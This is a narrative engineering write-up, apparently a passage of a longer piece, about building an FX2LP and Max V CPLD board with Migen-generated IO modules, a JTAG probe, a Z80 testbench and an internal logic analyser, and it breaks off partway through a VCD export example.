Three tinkerers took those words as they are. Overwhelmed by the complexity
implied by the multiplicity of inefficient tools, they thought that the time had
come to tackle this problem from another angle.

All they needed was a simple way to manipulate the exotic devices that they
required for their projects.
Manufactured by foreign organizations, the devices referred to here were
designed to fulfill a predefined purpose and were intended to be used as black
boxes. Without any knowledge of the internal mechanisms involved in their
operation, it was conceivable to integrate them as long as they were placed in
the kind of environment they were intended for.

But those tinkerers thought differently. Their situation was mostly complicated
by the fact that they had already acquired good control of their personal
computers, which they considered their main and perfect workstations. As this
environment was well defined and roughly understood, they were too stubborn to
learn another way to work: they unanimously decided that this method was the
most effective and the most compliant with the rest of their work.

So instead of reworking their methodology, they agreed that defining a third
device, whose only purpose was to handle the interfacing between the workstation
and the device under test, was inescapable. The first member of the group asked
the others what options were available to fill this position.

The second one said that he already made intensive use of the Arduino for
that. Providing easy access to and control of its GPIOs and some hardwired bus
controllers, it was suitable for the simplest cases.

The third one discussed the merits of the Bus Pirate from Dangerous
Prototypes. Mature and widely used, this tool provided direct control of its
interfaces via USB without the need to develop specific firmware before it
could actually be used.

The first one replied to these proposals that they had a common issue: they
simply performed the communication with the host by using an interface based on
the translation of USB to a UART running at 115200 baud. For him, it prevented
fine-grained configuration and thus limited access to the full capabilities
provided by the USB protocol.

They all agreed on this last point and started to work on a first prototype of
their response to this situation.

It was based on an STM32F072 microcontroller and mapped SPI, I2C, UART and CAN
signals to physical headers. As this chip was able to drive USB signals, a
mini-USB connector was directly connected to it.

Concerning the software side, one interesting idea here was to expose the
hardware interfaces using the corresponding subsystem in the Linux kernel. Even
though these subsystems were mostly used to describe on-chip interfaces,
adapting them to wrap up the USB functions was feasible. For instance, the SPI
bus exposed by the device could be manipulated as a regular spidev.

Although the concept of such a board was appealing at the time, limitations
quickly appeared. First of all, most of the USB protocol had to be implemented
in software on the STM32F072, which led to a significant overhead on each USB
transaction. Secondly, fully implementing the host driver in kernel space
implied a rigid configuration and was error-prone if not done correctly.
Finally, the overall stability of the STM32F072 MCU was quite poor, especially
during a development phase where on-chip debugging had to be frequently used.

One year passed and no one was actually enthusiastic about using this stillborn
project in a real context. The first one, whose credibility was at its lowest
point, found the courage to propose to the two others that they rethink the
project from the beginning. And they accepted, against all odds.

This write-up must be considered as the collection of thoughts
that led them to the design and the manufacture of a second version of this
small, unpretentious, and unfinished electronic board.

Chapter I: Forging the One Device

The first step for them was to clearly define how and what could make the
second version of the board better than the previous one. The main issue was
related to the lack of flexibility of the design and they wondered how
they could handle a protocol not supported by the microcontroller they used.

Then they decided to take a look at the wide range of Programmable Logic
Devices available nowadays. As a first prototype, a CPLD appeared to be the
best choice for such an application. Compared to a regular FPGA, these
non-volatile PLDs were cheaper and required a much simpler configuration
circuit. They also thought that the prototype was only designed to prove a
concept and that moving to a more powerful FPGA for the next versions was
conceivable.

Section I: From Ink...

From a high-level point of view, the board had been specified to expose a
reasonable number of IOs directly connected to a controller, here an Altera
Max V CPLD. As the flaky soft USB implementation of the previous version was
quite inconvenient to maintain and to keep reliable, the job here had been
assigned to a well-known and solid dedicated USB controller: the FX2LP from
Cypress Semiconductor. This highly integrated USB 2.0 microcontroller
implemented most of the protocol logic in silicon and only burdened its
integrated 8051's firmware with the high-level configuration aspect of USB.

And then came the question of the communication between the USB controller
and the IO controller. The FX2LP embedded a powerful mechanism to forward the
content of a USB endpoint to a hardware FIFO without any interaction with
the internal 8051. The words of these endpoint buffers could then be dequeued
by an external component using a hardware interface.

However, this interface was defined by a 16-bit data bus and 6 control signals,
which was quite pin-consuming for the CPLD they chose. Fortunately, another
mechanism offered by the FX2LP allowed the programming of a custom protocol
to exchange these data with the external world: the General Programmable
Interface (GPIF). As for the regular FIFO interface, this hardware unit was
almost completely independent from the 8051. The firmware was only responsible
for programming the hardware state machines used to represent the waveforms of
a one-word transmission.

In their case, they chose to allocate 8 wires for the bidirectional data bus,
3 control signals driven by the USB controller and 2 'ready' signals
initiated by the IO controller. At that point, none of them had actually thought
about the exact shape of the waveforms and the purpose of the control signals,
but they planned to consider that once the first board was fully manufactured.

The USB device interface was composed of 3 endpoints. Endpoint 0 acted as a
regular control endpoint and was used to transfer small requests. Meanwhile,
endpoints 2 and 6 were dedicated to bulk transmissions and receptions
respectively. The last two were directly connected to the internal FIFO while
the first one was completely handled by the 8051.

To power these components, the 5V supplied by the USB was first stepped down to
3.3V using a low-dropout voltage regulator to power the USB controller and the
IO banks of the CPLD, while a 1.8V regulator powered the CPLD's internal logic.

The main clock was managed by the FX2LP. Connected to a 24MHz crystal, the
internal PLL was configured by the 8051 firmware, allowing a CPU clock
frequency of 48MHz, 24MHz or 12MHz. As the output of the phase-locked loop was
also exposed outside the USB controller on the CLKOUT pin, the CPLD used it as
a system clock.

The GPIF unit had a dedicated clock that could be fed internally or imposed by
an external device. All operations on this interface were aligned to this
signal. In order to avoid dealing with multiple clock domains in the CPLD, they
arranged to drive the IFCLK signal from the IO controller at half the frequency
of the system clock.

An I2C EEPROM had been connected to the USB controller in order to store
its firmware in a persistent way. The internal reset logic of the FX2LP was
designed to scan the I2C bus for an EEPROM from which a valid firmware could be
loaded. Once the program was fully copied to internal RAM, no further
operations were performed on this bus.

After several tries, they finally validated the following schematic:

Section II: ...To Copper

Once the design was approved, the next step consisted of drawing the printed
circuit board. Two layers were enough to route the entire netlist within an
area of 5x5cm.

The top layer was dedicated to voltage regulation, the CPLD, connectors and
a couple of switches and LEDs. Meanwhile, the bottom one contained the whole
circuit required to make the USB controller work: crystal, EEPROM, I2C pull-up
resistors, ...

As the board was manually soldered, it was not conceivable for them to use BGA
components for this prototype. So the 100-pin LQFP version of the CPLD had been
used, as well as the 56-pin SSOP package of the Cypress chip.

After hours of painful electrical tests, a first sample of a fully soldered
board was born by the end of the Spring:

Chapter II: On Reprogrammability They Hoped

Although the physical board was ready, a firmware was still needed to make it
work. The situation was more complex than just a simple binary located in a
single ROM, as is the case for most boards of this category.

First of all, the firmware for the FX2LP had been implemented, which basically
consisted of configuring the USB and the GPIF units of the chip. Nothing
uncommon here: writing applications for this kind of microcontroller was quite
easy as it was well documented and tons of similar uses of this chip already
existed and were publicly available. The code was written in a couple of
hours and no new features had been added since, as they decided to make the
firmware serve one unique purpose: translating USB data to the IO controller
in the simplest and most lightweight way.

For them, most of the customizations that would be needed should be
fully-implemented at the IO controller level. The real challenge here was to
take advantage of the CPLD as a powerful and programmable IO controller.

One solution would be to base the CPLD's design on a soft-processor: modifying
IO's behaviour would mean loading a new firmware into its RAM. Although this
architecture was quite common when using an FPGA, it became more inconvenient
when basing it on a CPLD due to the lack of memory blocks.

The second solution would be to generate and configure the design of the CPLD
dynamically, according to the user's needs. As pursuing this concept using a
regular hardware description language seemed almost impossible to them, they
decided to fully base the design generation on Migen. This Python module
allowed the meta-programming of synchronous register transfer level designs
and handled the generation of a Verilog file that could then be synthesised by
the regular Altera toolchain.

Section I: Modularity And Modulation

They fully defined the architecture around the concept of modularity. To
demonstrate how it would transpire in a real context, they took the example of
a Pulse-Width Modulation interface.

The main principle of such a technique was to use a rectangular pulse wave whose
pulse width was modulated, resulting in the variation of the average value of
the waveform.

A possible implementation of a PWM module could be achieved by using a counter
whose width defined the period of the signal and a digital comparator to
generate the needed duty cycle.

In this case, the only signal that was likely exposed externally
would be the output of the comparator, negated or not. Moreover, a 'parameter'
of this circuit would be the left-input of the comparator and was typically the
kind of signal that would be interesting to implement as a register writable
from the host.

For their example, they also considered that the counter value could
be watched from the host.
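
The counter-and-comparator scheme can be modelled in a few lines of plain
Python. This is only a behavioural sketch, not the RTL they wrote: the function
names and the default 8-bit counter width are assumptions chosen for
illustration.

```python
def pwm_cycle(width, counter_bits=8):
    """Return one full PWM period as a list of 0/1 output samples.

    A free-running counter wraps every 2**counter_bits ticks. The comparator
    output is high while `width` (its left input) is greater than the counter.
    """
    period = 1 << counter_bits
    return [1 if width > counter else 0 for counter in range(period)]


def duty_cycle(width, counter_bits=8):
    """Average value of the waveform over one period (0.0 to 1.0)."""
    samples = pwm_cycle(width, counter_bits)
    return sum(samples) / len(samples)


print(duty_cycle(64))  # 64 high ticks out of 256 -> 0.25
```

In this model the width value plays the role of the host-writable parameter,
and the loop variable stands for the counter value that the host could watch.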

The 'parameter' signals were called 'Control Registers' and were intended to be
readable and/or writable from the host while the signals that would be eligible
to be mapped to a physical pin of the CPLD were called 'IO Signals'.

In a more generic way, this kind of module, that they called 'IO Module', could
always be represented according to the following template:

An internal logic block that could contain both combinational and sequential
logic left to IO Module's discretion.

'Control Registers' connected to an internal bus and used to watch and
control the activity of the internal logic from the host.

'IO Signals' intended to interact with an external component and to be
mapped to a real pin.

Imposing this kind of interface also meant imposing a huge, redundant and
overblown amount of HDL code only to provide the glue logic between the core
logic of the module and the rest of the design. This was where meta-programming
became appropriate.

A Python module called bmii had been developed to extend the structures
provided by Migen. For instance, an extension of the 'Module' objects was
included in this library to add all the facilities needed to generate the
intended glue logic.

    from bmii import *

    iom = IOModule("pwm")

This object contained the cregs special attribute, which was used to manage
the control registers of the IOModule. CtrlReg was in charge of constructing a
special 8-bit wide Migen Signal which embedded the extra information needed to
build the control register network. The direction of such a register had to be
manually specified during instantiation. It could be:

RDONLY: Only readable from the host. The signal had to be driven by the
internal logic of the IOModule.

WRONLY: The signal could only be written by the host, which could not read
it back. This direction was useful to hint to the toolchain that this signal
should be synthesised as a wire instead of a Verilog reg.

RDWR: The signal could be read and written from the host. Synthesis of this
kind of signal would likely result in a Verilog reg.

For the PWM IOModule, only the pulse's WIDTH and the COUNTER signals had
to be accessed from the host.

In the same way, the iosignals attribute handled the signals intended to be
mapped to physical pins. An IOSignal always corresponded to a 1-bit wide
signal. The direction of an IOSignal also had to be explicitly specified:

OUT: Signal driven by the IOModule.

IN: Signal driven by an external component and read by the IOModule's
logic.

DIRCTL: Signal driven by the IOModule and used to control the tri-state
buffer of a pin.

Section II: An Iron Hand In A Velvet Glove

The concept of control register was illustrated and justified. Their aim was
then to think about how to make them accessible from the host by using USB.

Concretely, this step meant defining a unit that would be able to translate
GPIF waveforms to a more convenient protocol to drive the internal bus.
This unit had been called 'Northbridge'.

The internal bus had been defined as follows:

MOSI[0:7] and MISO[0:7] represented both directions of the data bus.

WR distinguished a write operation from a read operation.

MADDR[0:2] and RADDR[0:4] were used to generate the chip select signal
for a module and a control register respectively.

REQ informed the control register that an operation was going to
be performed.

The issue here was related to the fact that the GPIF data bus had exactly the
same width as a control register. This meant that the addressing and the
read/write operations on the internal bus could not be achieved in a
single clock tick.

From the GPIF point of view, performing an operation on the internal bus meant
sending the module/control register address (latched by the Northbridge) before
proceeding to the actual read/write operation.

The northbridge managed the GPIF's control signals as follows:

CTL0 and CTL1 were basically forwarded to the REQ and WR signals of the
internal bus respectively.

CTL2 was used to indicate that the USB controller was latching an address
and that the current operation must not be considered as a regular write
operation.

The northbridge polled for operations by sampling the CTL0 signal on each tick
of the interface clock.
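
The two-step access (address first, data second) can be summarised with a small
behavioural model. It is a sketch under explicit assumptions, not their RTL:
the class name, the active-high polarity of the control lines and the packing
of the address byte (MADDR in the upper 3 bits, RADDR in the lower 5) are all
hypothetical.

```python
class NorthbridgeModel:
    """Behavioural model of the address-then-data bus access."""

    def __init__(self):
        self.maddr = 0   # latched 3-bit module address
        self.raddr = 0   # latched 5-bit control register address
        self.regs = {}   # (maddr, raddr) -> 8-bit register value

    def tick(self, data, ctl0_req, ctl1_wr, ctl2_addr):
        """Sample the GPIF lines once; return a byte only for read operations."""
        if not ctl0_req:
            return None                       # no operation requested
        if ctl2_addr:
            # Address phase: latch the address, do not touch any register.
            self.maddr = (data >> 5) & 0x07   # assumed packing
            self.raddr = data & 0x1F
            return None
        key = (self.maddr, self.raddr)
        if ctl1_wr:
            self.regs[key] = data & 0xFF      # regular write
            return None
        return self.regs.get(key, 0)          # regular read


nb = NorthbridgeModel()
nb.tick(0b001_00010, ctl0_req=1, ctl1_wr=1, ctl2_addr=1)  # select module 1, register 2
nb.tick(42, ctl0_req=1, ctl1_wr=1, ctl2_addr=0)           # write 42
print(nb.tick(0, ctl0_req=1, ctl1_wr=0, ctl2_addr=0))     # read it back
```

Three module address bits and five register address bits add up to exactly one
byte, which is why a single extra transfer on the 8-bit data bus is enough to
select a register.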

In addition to containing a value, control registers were generated with extra
signals representing the operation currently performed on them, which
facilitated their usage from the internal logic.

The wr and rd signals indicated that the control register was selected
and that a write or read operation respectively was going to be performed.
These signals were asserted during several clock ticks as they were directly
forwarded by the northbridge from the GPIF. So to facilitate their use in
a synchronous circuit, wr_pulse and rd_pulse were derived from them.
By using a 'level to pulse' state machine, wr_pulse was implemented
to be asserted during exactly one clock tick when the write operation was
completed, indicating to the internal logic that a valid value was
available in the register. Meanwhile, rd_pulse marked the beginning of
the read operation to inform the IOModule that the control register was going
to be read, giving it time to feed a correct value before the next
falling edge of the rd signal, the moment when its value was actually captured
by the northbridge.
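
A 'level to pulse' conversion boils down to comparing the current sample of a
signal with the previous one. The sketch below models it on a list of sampled
levels; the function name is hypothetical, and mapping rd_pulse to the rising
edge and wr_pulse to the falling edge is an interpretation of the description
above rather than a statement about the generated Verilog.

```python
def level_to_pulse(levels):
    """Return (start_pulses, end_pulses) for a signal sampled once per tick.

    start_pulses[i] is 1 on the tick where the level rises (beginning of an
    operation, as for rd_pulse); end_pulses[i] is 1 on the tick where it
    falls (operation completed, as for wr_pulse).
    """
    start, end = [], []
    previous = 0
    for level in levels:
        start.append(1 if level and not previous else 0)
        end.append(1 if previous and not level else 0)
        previous = level
    return start, end


wr = [0, 1, 1, 1, 0, 0]          # wr held high for three ticks
start, end = level_to_pulse(wr)
print(start)                      # [0, 1, 0, 0, 0, 0]
print(end)                        # [0, 0, 0, 0, 1, 0]
```

Whatever the length of the level, each pulse lasts exactly one tick, which is
what makes it convenient as an enable signal in synchronous logic.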

At that point, any control register could be accessed from the host using the
correct USB request. In order to make the usage of the USB easier from the host
point of view, an additional interface had been introduced: the BMIIModule.

A Python object of this type contained two special attributes: the first one
was the IOModule, which represented the RTL design, while the
second was called the driver of the BMIIModule. Automatically created,
the drv attribute was able to inspect the IOModule to generate the correct
USB requests according to the information specified in the RTL about the
control registers' addresses and directions.

    pwm = BMIIModule(iom)

To finalize the generation of the IO controller design, the BMII object acted
as a top-level representation of the whole design of the board. It had to be
informed that a new module was to be added by using its add_module method.

A call to this procedure meant connecting the IOModule to the internal bus
and allocating module and control register addresses.

    b = BMII()
    b.add_module(pwm)

Once the CPLD was configured, the host could easily access the control
registers by simply setting the attributes of the drv object, named after the
control registers:

    pwm.drv.WIDTH = 42
    cnt = int(pwm.drv.COUNTER)
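
How attribute access can be turned into bus requests is easy to illustrate in
plain Python. The sketch below is not the bmii driver: the Driver and FakeBus
classes, the register table layout and the direction chosen for WIDTH are all
hypothetical, and the USB transport is replaced by a dictionary.

```python
class FakeBus:
    """Stand-in for the USB transport: stores register values in a dict."""

    def __init__(self):
        self.memory = {}

    def write(self, addr, value):
        self.memory[addr] = value

    def read(self, addr):
        return self.memory.get(addr, 0)


class Driver:
    """Map attribute reads and writes to register accesses."""

    def __init__(self, registers, bus):
        # Store internals without going through our own __setattr__.
        object.__setattr__(self, "_registers", registers)  # name -> (addr, direction)
        object.__setattr__(self, "_bus", bus)

    def _lookup(self, name):
        try:
            return self._registers[name]
        except KeyError:
            raise AttributeError(name) from None

    def __getattr__(self, name):
        # Only called for names that are not regular attributes.
        addr, direction = self._lookup(name)
        if direction == "WRONLY":
            raise AttributeError(f"{name} is write-only")
        return self._bus.read(addr)

    def __setattr__(self, name, value):
        addr, direction = self._lookup(name)
        if direction == "RDONLY":
            raise AttributeError(f"{name} is read-only")
        self._bus.write(addr, value & 0xFF)


drv = Driver({"WIDTH": (0, "RDWR"), "COUNTER": (1, "RDONLY")}, FakeBus())
drv.WIDTH = 42
print(drv.WIDTH, int(drv.COUNTER))
```

Keeping the register table as data is what would let such a driver be derived
automatically from the directions and addresses declared in the RTL.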

Section III: The Signal Goes South

In the same way the northbridge managed the communication with the external
USB controller, another dedicated unit had been defined to handle the
multiplexing of the IOSignals to physical IO pins. Obviously called the
southbridge, it was implemented as a special IOModule which had no
IOSignals and was only in charge of managing the signals coming from other
modules. For each physical pin, the southbridge was in charge of generating the
following circuit:

Each pin was considered bidirectional and the direction could be configured
with an IOSignal defined as such. An unlimited number of signals could read
the value of a pin while only one could drive it.

To inform the southbridge that an IOSignal had to be connected to a pin,
an assignment to the pins attribute of this unit had to be performed
as follows:

    b.ioctl.sb.pins.LED0 += pwm.iomodule.iosignals.OUT

The direction declared during the definition of the IOSignal was used to
determine where the signal had to be connected on the pin multiplexing circuit.
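
The rule "many readers, a single driver" and the use of the += operator can be
mimicked with a small Python class. This is a hypothetical model, not the
southbridge code: the Pin class and the (direction, label) tuples standing in
for IOSignals are assumptions.

```python
class Pin:
    """Model of one physical pin and the signals attached to it."""

    def __init__(self, name):
        self.name = name
        self.driver = None    # at most one OUT signal
        self.dirctl = None    # at most one DIRCTL signal
        self.readers = []     # any number of IN signals

    def __iadd__(self, signal):
        direction, label = signal
        if direction == "IN":
            self.readers.append(label)
        elif direction == "OUT":
            if self.driver is not None:
                raise ValueError(f"{self.name} is already driven by {self.driver}")
            self.driver = label
        elif direction == "DIRCTL":
            if self.dirctl is not None:
                raise ValueError(f"{self.name} direction is already controlled")
            self.dirctl = label
        else:
            raise ValueError(f"unknown direction {direction!r}")
        return self           # required so that `pin += x` keeps the Pin object


led0 = Pin("LED0")
led0 += ("OUT", "pwm.OUT")
led0 += ("IN", "probe0.IN")
led0 += ("IN", "probe1.IN")
print(led0.driver, led0.readers)
```

Attaching a second OUT signal to the same pin raises an error in this model,
which reflects the constraint that only one signal may drive a pin.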

As the southbridge was considered a regular IOModule, it was connected to
the internal bus and thus exposed its own control registers.
This opportunity was leveraged to make the pins controllable from the host,
bypassing the need to define a specific IOModule when a simple operation
had to be performed on the IOs.

The PINDIR, PINDIRMUX, PINOUT, PINMUX and PINSCAN signals of each pin
were accessible using the southbridge's control registers. For instance, making
the LED blink could be commanded by:

The northbridge used two control registers defined for testing purposes only.
The IDCODE contained a magic number read by the USB controller to verify the
validity of the CPLD's configuration while the SCRATCH register was used to
test write operations on the bus.

To sum up, the following architecture had been defined as the basis for further
improvements:

Section IV: An Autarchical Sequence

As this architecture was mainly based on the flexibility provided by the CPLD,
one issue still remained before becoming truly usable: the compiling and
programming sequences of a BMII's design had to stay self-contained and to avoid
the need of external hardware tools.

The building sequence aimed to produce the binary blob of the USB firmware as
well as the bitstream of the IO controller. For the FX2LP, a ninja build file
was generated to compile the custom firmware using sdcc.

Concerning the IO controller, the Verilog generation was left to Migen while
the building of the bitstream was handled by Quartus.

    b.build_all()

The programming sequence was a bit more tricky. A first and trivial way to
achieve this was to use a USB Blaster JTAG probe to configure the CPLD with the
desired bitstream. To allow the board to program itself, the CPLD's JTAG
signals had been connected to a tri-state buffer in addition to the regular
10-pin JTAG header. Implemented with a standard 74244, this buffer was driven
by the USB controller. The goal of this circuit was to give the USB controller
the ability to communicate with the CPLD via JTAG when the JTAGE signal was
asserted.

To be able to reuse the Quartus Programmer software to program the CPLD, the
open-source implementation of the USB Blaster protocol for FX2LP
(ixo.de USB JTAG) had been adapted to match the wiring of their circuit.

    b.program_all()

The programming sequence could be summarized as follows:

The first step was to load the custom USB Blaster firmware into the USB
controller using fxload.

If a JTAG IDCODE scan was successful, the bitstream was uploaded using
Quartus Programmer.

To be able to write their own FX2LP firmware to the EEPROM, a second stage
firmware loader was programmed in the chip. It added a new USB vendor command
allowing writing operations on the I2C bus.

Finally, the regular firmware was loaded in the USB controller.

Chapter III: The Fellowship Of The Joint Test

As a first application of their board, the second tinkerer proposed to
implement a full-featured JTAG probe that anyone could use as an alternative to
Flyswatter, Bus Blaster or any other cheap JTAG probe.

The JTAG defines an electrical standard for on-chip instrumentation by using a
dedicated debug port implementing a serial communication interface. This
protocol was well-defined and simple enough to be used as a comprehensive
example.

The third one replied that demonstrating the usefulness of their project by
trying to mimic other well-known and mature JTAG probes was a waste of time
since reaching comparable performance would require more effort than he
could imagine at the time.

The first tinkerer countered that argument by pointing out that no cheap
JTAG probe was generic enough to be compatible with a very wide range of
platforms and that very few of them were designed to be used in contexts other
than CPU on-chip debugging. He agreed and started to think about a possible
implementation of such a protocol using their project.

Section I: The Bridge Of Shockley

Even though the JTAG standard was quite strict about the communication logic,
the electrical characteristics of the signals were left to the target device.
This meant that the probe had the responsibility to drive them with the target
voltage.

Assuming that the main board was only able to drive 3.3V IOs, expanding it with
the needed interface was required.

A first version had been implemented using voltage level shifters and worked
well with some mainstream devices. However, some platforms from specific
manufacturers pulled up JTAG signals with very low-value resistors, which
forced the probe to drive more current than most voltage level shifters could
supply.

As a quick fix, the expansion board had been equipped with bipolar junction
transistors for output signals.

More generally, they thought that being forced to design an expansion board
to electrically convert signals from the main board to the driven target was
not a big deal. The main board's IOs simply could not be electrically universal.

Section II: The Self-Surgery

For a naive implementation of the JTAG protocol, the IOModule consisted of
simply connecting the TMS and TDI outputs to a write-only control register while
wiring the TCK to its wr_pulse signal. In this configuration, each JTAG
clock tick was triggered by writing to this control register.
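
With such a register, shifting a value through a JTAG chain becomes a plain
sequence of register writes, one per TCK tick. The sketch below only builds
that sequence; the bit positions of TMS and TDI inside the register and the
function name are assumptions, while shifting LSB first and raising TMS on the
last bit to leave the Shift state follow the usual JTAG convention.

```python
TMS_BIT = 0x01  # assumed position of TMS in the control register
TDI_BIT = 0x02  # assumed position of TDI in the control register


def shift_bits(value, length):
    """Return the register writes that shift `length` bits of `value`.

    Bits go out LSB first. TMS is raised together with the last bit so that
    the TAP moves from its Shift state to Exit1 on that same clock tick.
    """
    writes = []
    for i in range(length):
        word = TDI_BIT if (value >> i) & 1 else 0
        if i == length - 1:
            word |= TMS_BIT
        writes.append(word)
    return writes


print(shift_bits(0b101, 3))  # [2, 0, 3]
```

Since each write costs a full USB-to-bus transaction, this naive scheme trades
speed for simplicity.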

Each device on a JTAG daisy chain communicated via a Test Access Port.
This hardware unit implemented a stateful protocol to expose its debug
facilities. As it was possible to make all of them converge to a stable reset
state, it was easy to walk through this state machine while keeping all TAPs
synchronized.

Assuming this, a single state machine was implemented in the IOModule to
keep track of the current TAP state. A control register had been allocated
to allow the host to check this state when needed.
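
The state machine being tracked is the standard 16-state TAP controller, whose
next state depends only on the value of TMS at each TCK tick. The table below
reproduces it in Python as a reference model; the dictionary layout and the
walk helper are illustrative choices, not the IOModule's implementation.

```python
# state -> (next state when TMS=0, next state when TMS=1)
TAP_TRANSITIONS = {
    "TEST_LOGIC_RESET": ("RUN_TEST_IDLE", "TEST_LOGIC_RESET"),
    "RUN_TEST_IDLE":    ("RUN_TEST_IDLE", "SELECT_DR_SCAN"),
    "SELECT_DR_SCAN":   ("CAPTURE_DR", "SELECT_IR_SCAN"),
    "CAPTURE_DR":       ("SHIFT_DR", "EXIT1_DR"),
    "SHIFT_DR":         ("SHIFT_DR", "EXIT1_DR"),
    "EXIT1_DR":         ("PAUSE_DR", "UPDATE_DR"),
    "PAUSE_DR":         ("PAUSE_DR", "EXIT2_DR"),
    "EXIT2_DR":         ("SHIFT_DR", "UPDATE_DR"),
    "UPDATE_DR":        ("RUN_TEST_IDLE", "SELECT_DR_SCAN"),
    "SELECT_IR_SCAN":   ("CAPTURE_IR", "TEST_LOGIC_RESET"),
    "CAPTURE_IR":       ("SHIFT_IR", "EXIT1_IR"),
    "SHIFT_IR":         ("SHIFT_IR", "EXIT1_IR"),
    "EXIT1_IR":         ("PAUSE_IR", "UPDATE_IR"),
    "PAUSE_IR":         ("PAUSE_IR", "EXIT2_IR"),
    "EXIT2_IR":         ("SHIFT_IR", "UPDATE_IR"),
    "UPDATE_IR":        ("RUN_TEST_IDLE", "SELECT_DR_SCAN"),
}


def walk(state, tms_bits):
    """Follow the TAP state machine for a sequence of TMS values."""
    for tms in tms_bits:
        state = TAP_TRANSITIONS[state][tms]
    return state


# Five ticks with TMS high bring any TAP back to Test-Logic-Reset.
assert all(walk(s, [1] * 5) == "TEST_LOGIC_RESET" for s in TAP_TRANSITIONS)
print(walk("TEST_LOGIC_RESET", [0, 1, 0, 0]))  # SHIFT_DR
```

The five-ones property is what allows every TAP of a chain to converge to the
same state, after which a single tracker is enough for the whole chain.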

Devices responded to JTAG scans with the TDO signal. A FIFO block was
used to buffer received data before being read by the host through a read-only
register. This case perfectly demonstrated the usage of the rd_pulse signal
since it was used to dequeue the next value of the FIFO submodule.

Although most platforms' JTAG daisy chains were short and fixed, some of them
could dynamically append TAPs to the chain, making general-purpose
JTAG tools unusable. To handle this kind of situation, facilities had been
implemented to describe a dynamic TAP network.

    from bmii.modules.jtag import JTAG, TAP, DR

A JTAG object extended a regular BMIIModule to abstract the low-level
operations to the JTAG's IOModule.

TAP and DR were provided to describe the current layout of the TAP network.
For instance, describing the Max V's JTAG would look like this:

A possible improvement for this would be to generate this TAP network
directly from the BSDL files of the daisy-chained devices. The usage of BJTs to
drive JTAG signals was also a very quick and easy response to the low
pull-up resistance problem. The third tinkerer complained that many other
solutions could be implemented there, as the BJTs had a very long switching time
and thus forced them to drive signals at 12MHz while many targets supported
being clocked at up to 100MHz on their debug port.

Chapter IV: And In Darkness Bind Them

Sceptical about the results of the first application, the third tinkerer
thought about a niche application that only a few people would actually need.
Enthusiastic but upset by the pragmatism of the two others, he left the group to
develop his idea on his own.

For him, a second purpose for this board was purely and simply to act as a
test bench for analysing black-boxed devices. To demonstrate his idea, he chose
the first device he could find in his drawer: a Z80 packaged in a DIP-40.

Primarily sold by Zilog as an improved Intel 8080, it had become a very popular
processor for simple embedded applications since it was truly easy to make this
chip work with a custom circuit. This device was thus the perfect guinea
pig for his experiments.

Section I: The Calm Before The Storm

Before trying to blow up the chip, defining the RTL needed to
correctly drive the CPU was necessary.

    iom = IOModule("Z80TB")

The DIP-40 version of this CPU exposed a 16-bit address bus and an 8-bit data
bus. As the latter was bidirectional, three different IOSignals had to be
defined: DIN, DOUT and DDIR. In order to keep the main board and the
device under test synchronized, the CPU's clock was managed by the IOModule.
All other required control signals were defined as IOSignals.

The clock signal of the Z80 had been fixed to half the frequency of the
system clock. Due to the clocking requirements of the chip, this signal was
fixed to 8MHz.

    iom.sync += iom.iosignals.CLK.eq(~iom.iosignals.CLK)

Requests from the Z80 CPU followed 3 stages. When it was not halted, the
testbench entered an IDLE state. During this one, the CPU was still
performing operations internally but did not request any external resources.

The second stage followed a request detection. The goal here was to freeze the
CPU execution until the host provided an instruction to the testbench about how
to handle the request.

Finally, the last stage meant actually responding to CPU's request according to
host instructions.

While waiting for an answer from the host, the trick here was to assert the
_WAIT input of the CPU in order to notify it that the bus cycle could not be
completed at that moment. This left enough time for the host to communicate its
desired operation. To finalize a write operation, the host just had to read
from the WRITE register. Completing a read operation was performed by
writing to the READ control register.
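
The three stages and the role of _WAIT can be captured by a tiny state machine.
The model below is a hypothetical sketch in plain Python: only the IDLE name
comes from the description above, while the other stage names, the class and
the two boolean inputs are assumptions standing in for the real bus signals
and control register accesses.

```python
from enum import Enum


class Stage(Enum):
    IDLE = 0        # CPU is running, no external request pending
    WAIT_HOST = 1   # request detected, CPU frozen with _WAIT asserted
    RESPOND = 2     # host has answered, bus cycle is being completed


class Z80TestbenchModel:
    def __init__(self):
        self.stage = Stage.IDLE
        self.wait_n = 1   # _WAIT is active low: 1 means released

    def tick(self, request, host_answered):
        """Advance by one clock tick and return the new stage."""
        if self.stage is Stage.IDLE and request:
            self.stage = Stage.WAIT_HOST
            self.wait_n = 0               # freeze the CPU
        elif self.stage is Stage.WAIT_HOST and host_answered:
            self.stage = Stage.RESPOND
            self.wait_n = 1               # let the bus cycle finish
        elif self.stage is Stage.RESPOND and not request:
            self.stage = Stage.IDLE
        return self.stage


tb = Z80TestbenchModel()
print(tb.tick(request=True, host_answered=False), tb.wait_n)
print(tb.tick(request=True, host_answered=True), tb.wait_n)
print(tb.tick(request=False, host_answered=False), tb.wait_n)
```

In this model `host_answered` represents the host reading the WRITE register
or writing the READ register, whichever applies to the pending request.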

Chapter V: The Feebleness Appears

In the meantime, the two other tinkerers were focussed on testing the
main board on some more pragmatic scenarios in order to check its limitations,
with the hope that it would serve a real purpose.

Section I: The Relativity of Space...

Their experience with the implementation of a JTAG module was marked by the
difficulty of debugging and tracing the state of the digital design. As the
northbridge and the internal bus logic were considered reliable enough, they
decided to implement an IOModule exclusively designed to probe any other
signal of the IO controller design.

Acting as an internal logic analyser, a probing circuit composed of one control
register fed by a FIFO was generated for each probed signal.

The capture was triggered by a special configurable signal and could be reset
by the host at any moment.

As an example, the following design made the main board act as a very cheap
logic analyzer where all IO signals were simultaneously probed. The trigger was
wired to the physical switch input:

The SPI module initiated a transaction when its TX register was written. Its
wr_pulse was then used to define the trigger of the logic analyzer as the
goal was to analyse the output signal during an SPI activity.

The capture method of a logic analyzer object waited for a capture to be
completed and then dequeued the samples by reading the control register of each
probe.

Finally, the show method could be used to generate the captured waveforms to
a VCD file and to display it using gtkwave:
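
As a rough idea of what dumping samples to VCD involves, here is a minimal
sketch that renders 1-bit captures as Value Change Dump text. It is not the
show method itself: the function name, the input layout (one list of 0/1
samples per signal name) and the timescale are assumptions.

```python
def to_vcd(signals, timescale="1 us"):
    """Render {name: [0/1 samples]} as VCD text, one timestamp per sample.

    Identifiers are single printable ASCII characters starting at '!',
    so this sketch supports at most 94 signals.
    """
    names = list(signals)
    ids = {name: chr(33 + i) for i, name in enumerate(names)}
    lines = [f"$timescale {timescale} $end", "$scope module capture $end"]
    for name in names:
        lines.append(f"$var wire 1 {ids[name]} {name} $end")
    lines += ["$upscope $end", "$enddefinitions $end"]

    previous = {}
    length = max((len(s) for s in signals.values()), default=0)
    for t in range(length):
        changes = []
        for name in names:
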